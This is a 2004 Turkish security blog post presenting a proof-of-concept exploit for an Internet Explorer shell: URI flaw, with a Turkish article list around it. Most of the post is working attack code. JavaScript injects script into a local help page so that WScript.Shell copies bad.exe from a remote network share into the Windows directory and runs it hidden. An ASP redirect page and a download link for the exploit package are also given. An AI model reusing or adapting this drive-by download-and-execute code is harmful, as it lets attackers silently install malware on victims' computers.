IE Shell URI Download and Execute, POC Exploit
13.07.2004
Okuyucu : 13.980
Günlük Okuyucu : 9,5
Okuyucu : 13.980
Günlük Okuyucu : 9,5
Code is based on http://www.securityfocus.com/archive/1/367878( POC by Jelmer) message. I just added a new feature download and then execute application. Also I use Wscript.Shell in Javascript instead of Shell.Application
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER> var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var e="%comspec% /c copy "+rF+" "+wF; var err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
This will copy an executable (here : bad.exe) to victim's windows directory and execute it. All progresses are completly hidden.
Also I converted redir.jsp to redir.asp
<% Response.Expires = 1 Response.Expiresabsolute = Now() - 1 Response.AddHeader "pragma","no-cache" Response.AddHeader "cache-control","private" Response.CacheControl = "no-cache" For x = 1 to 500000 'Time z = z + 10 Next Response.Status = "302 Found" Response.AddHeader "Content-Length", "4" Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm" %>
Download : http://ferruh.mavituna.com/exploits/fm_ieshell.zip

Yorumlar
Yorum Ekle
Diğer Yazılar
IE7 ve Firefox Hiz Kirsalistirmasi
İĞREEENÇSİN, ARTI, ARTI, HAYVAAANSIN!
IIS 7.0, ilk izlenimlermiş
İki Beklenen MMORPG
İkona, Kötü Ruh, Hz. Muhammed
İleri Seviye Javascript
Iletisim Formunu Tekrar Kullaniniz
İlk Açık Bilgisayar Parçalama Şampiyonası !
İlk Pocket PC Trojanı için Reverse Engineering
Neredeyim ?
Ferruh.Mavituna » Güvenlik (Security) » IE Shell URI Download and Execute, POC Exploit